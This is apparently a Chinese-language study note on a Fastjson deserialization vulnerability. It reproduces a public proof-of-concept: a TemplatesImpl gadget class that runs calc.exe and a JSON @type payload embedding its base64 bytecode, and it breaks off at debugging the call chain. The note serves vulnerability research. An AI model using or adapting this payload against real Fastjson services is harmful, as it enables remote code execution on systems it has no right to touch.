java

这个漏洞一直只了解个大概,最近有空深入研究一下

JAVA环境

```
java version "1.8.0_211"
Java(TM) SE Runtime Environment (build 1.8.0_211-b12)
Java HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)
```

建立一个USER类

```java
public class User {
    private int age;
    public String username;
    private String secret;

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public String getUsername() {
        return username;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public String getSecret() {
        return secret;
    }

    @Override
    public String toString() {
        return this.age + "," + this.username + "," + this.secret;
    }
}
```

函数作用

- `JSON.toJSONString(Object)` 将对象序列化成json格式
- `JSON.toJSONString(Object, SerializerFeature.WriteClassName)` 将对象序列化成json格式,并且记录了对象所属的类的信息
- `JSON.parse(Json)` 将json格式返回为对象(但是反序列化类对象没有@Type时会报错)
- `JSON.parseObject(Json)` 返回对象是com.alibaba.fastjson.JSONObject类
- `JSON.parseObject(Json, Object.class)` 返回对象会根据json中的@Type来决定
- `JSON.parseObject(Json, User.class, Feature.SupportNonPublicField);` 会把Json数据对应的类中的私有成员也给还原

直接用网上的利用POC

```java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class poc extends AbstractTranslet {
    public poc() throws IOException {
        Runtime.getRuntime().exec("calc.exe");
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }

    @Override
    public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] haFndlers) throws TransletException {
    }

    public static void main(String[] args) throws Exception {
        poc t = new poc();
    }
}
```

编译这个文件,将其内容进行base64编码,用fastjson把对象还原

```java
import java.io.*;
import java.util.HashMap;
import java.util.Map;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import org.apache.commons.io.IOUtils;
import org.apache.commons.codec.binary.Base64;

public class Vultest {
    public static String readClass(String cls) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray());
    }

    public static void main(String[] args) throws UnsupportedEncodingException {
        ParserConfig config = new ParserConfig();
        String evilCode = readClass("D://code//fastjsonvul//target//classes//Poc.class");
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        String text1 = "{\"@type\":\"" + NASTY_CLASS + "\",\"_bytecodes\":[\"" + evilCode + "\"],'_name':'a.b','_tfactory':{},\"_outputProperties\":{},"
                + "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";
        Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);
    }
}
```

注意这里必须带上 `Feature.SupportNonPublicField`:payload 里的 `_bytecodes`、`_tfactory`、`_outputProperties` 这些都是 TemplatesImpl 的私有成员,没有这个 Feature 它们根本不会被还原,这条链也就走不通。

在exec下断点查看调用